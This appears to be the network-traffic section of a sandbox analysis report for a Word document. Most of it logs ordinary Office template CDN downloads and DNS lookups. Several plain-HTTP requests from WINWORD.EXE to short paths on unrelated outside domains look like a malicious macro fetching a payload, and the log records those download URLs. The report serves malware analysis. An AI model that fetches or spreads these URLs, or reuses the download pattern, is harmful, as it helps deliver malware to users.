x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:25 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345744402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
ETag: 0x8D60DFAA9FC6013
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9ae01919-001e-0028-0a97-a0eb82000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345746401.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
ETag: 0x8D60DDB82865741
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 56e4750e-f01e-010c-3897-a0e32f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345747501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
ETag: 0x8D60DDB967B9FA5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7297223a-101e-00d5-6197-a070b4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345749101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
Last-Modified: Wed, 29 Aug 2018 18:23:56 GMT
ETag: 0x8D60DDC9562A996
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7b3a04c7-701e-00c5-3897-a04652000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345748501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: vrEqBGTQlsozuupDUs6ADw==
Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
ETag: 0x8D60DDBDA502B66
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8dbaa68b-901e-00e1-2b97-a0566f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345749601.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
ETag: 0x8D60DDC2BE7DF3C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a2e8f81c-101e-0034-3f97-a0b9e2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345750301.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
Last-Modified: Wed, 29 Aug 2018 18:15:11 GMT
ETag: 0x8D60DDB5C4DB3A1
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02f02c12-801e-0026-1997-a0c232000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345751501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
ETag: 0x8D60DDC26100537
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6340fd72-201e-0152-6397-a008cf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0345751001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
ETag: 0x8D60DDB6BA6E455
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 035d76e5-001e-0155-6297-a064ac000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03998158.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IaS3txYxwszaX7umN1Hw0g==
Last-Modified: Fri, 22 Apr 2016 16:11:18 GMT
ETag: 0x8D36AC8BD065412
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428ca141-801e-0139-1397-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0403392501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
ETag: 0x8D60DDBA5EDDA1A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 30476c6f-401e-000a-4097-a021e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0403392701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8laspQm0xsAUTSeMcDawqA==
Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
ETag: 0x8D60DDBDD02F94A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 73ebaaec-101e-0024-1d97-a07c8a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0403392901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: go+WAx9Av468teUqrut+TA==
Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
ETag: 0x8D60DDC4354B7FB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d0d6cad7-401e-0109-1e97-a031f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0403393701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
ETag: 0x8D60DDBFE4BB50C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6efd8084-101e-00b2-7c97-a0755b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:25 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp1000111403.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 1OrACenntkuLABroK4EC+g==
Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
ETag: 0x8D5E78D3A9D8C97
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: faf4e13b-801e-0036-5697-a0075a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:25 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:8.8.8.8:53Request184.61.62.23.in-addr.arpaIN PTRResponse184.61.62.23.in-addr.arpaIN PTRa23-62-61-184deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request184.61.62.23.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request17.251.17.2.in-addr.arpaIN PTRResponse17.251.17.2.in-addr.arpaIN PTRa2-17-251-17deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request240.221.184.93.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request23.236.111.52.in-addr.arpaIN PTRResponse
-
52.109.89.19:443https://roaming.officeapps.live.com/rs/RoamingSoapService.svctls, httpWINWORD.EXE1.7kB 7.7kB 11 10
HTTP Request
POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svcHTTP Response
200 -
942 B 39.3kB 19 32
HTTP Request
GET http://anapapoliv.ru/Sp4naHTTP Response
200 -
306 B 595 B 5 3
HTTP Request
GET http://shorecrestschools.com/nnQkNHTTP Response
302 -
737 B 4.4kB 8 7
HTTP Request
GET https://shorecrestschools.com/nnQkNHTTP Response
404 -
295 B 648 B 5 3
HTTP Request
GET http://comicole.com/2HZHTTP Response
404 -
303 B 523 B 5 3
HTTP Request
GET http://elartedelaaccion.es/6HylHTTP Response
301 -
1.6kB 54.9kB 26 45
HTTP Request
GET https://elartedelaaccion.es/6HylHTTP Response
404 -
23.62.61.184:443https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2Ctls, httpWINWORD.EXE1.2kB 5.9kB 8 8
HTTP Request
GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2CHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cabtls, httpWINWORD.EXE108.6kB 3.6MB 1866 2553
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cabtls, httpWINWORD.EXE2.6kB 50.1kB 33 42
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cabtls, httpWINWORD.EXE2.2kB 41.3kB 29 37
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cabtls, httpWINWORD.EXE2.0kB 53.0kB 26 44
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cabtls, httpWINWORD.EXE26.1kB 759.1kB 429 553
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cabtls, httpWINWORD.EXE1.9kB 39.8kB 24 35
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cabtls, httpWINWORD.EXE2.1kB 37.6kB 26 33
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cabtls, httpWINWORD.EXE1.9kB 37.5kB 23 33
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cabtls, httpWINWORD.EXE2.4kB 39.0kB 30 34
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cabtls, httpWINWORD.EXE2.0kB 34.9kB 25 31
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cabtls, httpWINWORD.EXE2.3kB 37.0kB 29 33
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cabtls, httpWINWORD.EXE2.2kB 37.1kB 29 33
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cabtls, httpWINWORD.EXE2.5kB 41.7kB 31 36
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cabtls, httpWINWORD.EXE2.0kB 37.5kB 25 33
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cabtls, httpWINWORD.EXE11.4kB 323.6kB 188 238
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cabtls, httpWINWORD.EXE2.5kB 38.9kB 31 34
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cabtls, httpWINWORD.EXE31.0kB 751.4kB 481 545
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cabtls, httpWINWORD.EXE2.0kB 27.4kB 24 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cabtls, httpWINWORD.EXE2.0kB 26.2kB 24 25
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cabtls, httpWINWORD.EXE2.7kB 37.1kB 32 32
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cabtls, httpWINWORD.EXE2.2kB 32.9kB 27 30
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cabtls, httpWINWORD.EXE2.1kB 27.9kB 24 25
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cabtls, httpWINWORD.EXE62.6kB 2.0MB 1112 1429
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cabtls, httpWINWORD.EXE44.7kB 1.2MB 734 842
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cabtls, httpWINWORD.EXE1.6kB 29.4kB 17 27
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cabtls, httpWINWORD.EXE8.7kB 269.3kB 139 201
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cabHTTP Response
200HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cabtls, httpWINWORD.EXE2.2kB 25.9kB 19 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cabtls, httpWINWORD.EXE1.6kB 26.8kB 17 25
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cabtls, httpWINWORD.EXE1.6kB 28.4kB 17 27
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cabtls, httpWINWORD.EXE1.6kB 28.5kB 18 27
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cabtls, httpWINWORD.EXE1.6kB 28.1kB 17 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cabtls, httpWINWORD.EXE1.6kB 25.0kB 18 24
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cabtls, httpWINWORD.EXE1.7kB 27.1kB 19 26
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cabHTTP Response
200 -
2.17.251.17:443https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cabtls, httpWINWORD.EXE12.8kB 310.0kB 202 228
HTTP Request
GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cabHTTP Response
200 -
